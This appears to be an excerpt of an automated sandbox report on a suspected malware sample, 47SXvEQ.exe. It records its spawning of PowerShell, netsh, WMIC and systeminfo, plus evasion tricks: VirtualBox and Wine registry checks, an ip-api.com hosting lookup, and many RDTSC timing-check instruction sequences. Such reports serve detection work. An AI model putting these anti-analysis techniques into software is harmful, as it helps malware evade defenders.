                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                Source: C:\Users\user\Desktop\47SXvEQ.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106B089 second address: 106B092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106A400 second address: 106A40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106A40D second address: 106A422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC8Fh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106A572 second address: 106A577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106A577 second address: 106A594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F87BD02CC97h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106A594 second address: 106A59E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F87BC5165B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106A59E second address: 106A5BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F87BD02CC86h 0x0000000d jnl 00007F87BD02CC86h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106A5BC second address: 106A5C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106D1F5 second address: 106D216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F87BD02CC90h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jp 00007F87BD02CC86h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106D216 second address: 106D234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F87BC5165C0h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106D234 second address: 106D26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F87BD02CC86h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F87BD02CC99h 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F87BD02CC8Ah 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106D26B second address: 106D29C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F87BC5165BAh 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106D29C second address: 106D2A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106D3B9 second address: 106D3E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edx, dword ptr [ebp+12DC3387h] 0x00000011 push 00000000h 0x00000013 sub si, 9630h 0x00000018 push 8F993949h 0x0000001d push eax 0x0000001e push edx 0x0000001f jl 00007F87BC5165B8h 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106D3E0 second address: 106D42B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F87BD02CC94h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 7066C737h 0x00000014 stc 0x00000015 push 00000003h 0x00000017 mov edx, dword ptr [ebp+12DC316Ch] 0x0000001d push 00000000h 0x0000001f mov edi, esi 0x00000021 push 00000003h 0x00000023 mov esi, dword ptr [ebp+12DC343Bh] 0x00000029 push A20FF654h 0x0000002e jl 00007F87BD02CC92h 0x00000034 jp 00007F87BD02CC8Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106D42B second address: 106D46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 add dword ptr [esp], 1DF009ACh 0x0000000b movzx esi, si 0x0000000e lea ebx, dword ptr [ebp+12F49E17h] 0x00000014 mov dword ptr [ebp+12DC1DCAh], eax 0x0000001a xchg eax, ebx 0x0000001b push ecx 0x0000001c jns 00007F87BC5165C6h 0x00000022 jmp 00007F87BC5165C0h 0x00000027 pop ecx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F87BC5165BCh 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106D46D second address: 106D485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC94h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 106D485 second address: 106D489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108F285 second address: 108F28C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108F28C second address: 108F292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108D10B second address: 108D121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F87BD02CC86h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108D121 second address: 108D12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 popad 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108D3DB second address: 108D3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108DAB1 second address: 108DAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108DAB5 second address: 108DAB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108DAB9 second address: 108DB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F87BC5165CCh 0x0000000c popad 0x0000000d push eax 0x0000000e je 00007F87BC5165CCh 0x00000014 jmp 00007F87BC5165C6h 0x00000019 je 00007F87BC5165BCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108DDB5 second address: 108DDBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F87BD02CC86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108DDBF second address: 108DDDB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F87BC5165BBh 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108DF81 second address: 108DF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108DF87 second address: 108DFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F87BC5165B6h 0x0000000d jmp 00007F87BC5165BCh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1085388 second address: 108539A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F87BD02CC8Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108539A second address: 10853BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F87BC5165C9h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10853BA second address: 10853CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F87BD02CC8Ch 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10853CF second address: 10853EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C3h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F87BC5165B6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108E409 second address: 108E41D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F87BD02CC8Bh 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108E9B3 second address: 108EA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F87BC5165C2h 0x0000000a pushad 0x0000000b popad 0x0000000c jno 00007F87BC5165B6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F87BC5165BAh 0x0000001b jmp 00007F87BC5165C2h 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jng 00007F87BC5165BEh 0x0000002c pushad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108EA02 second address: 108EA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108EA09 second address: 108EA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108EA10 second address: 108EA20 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F87BD02CC8Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
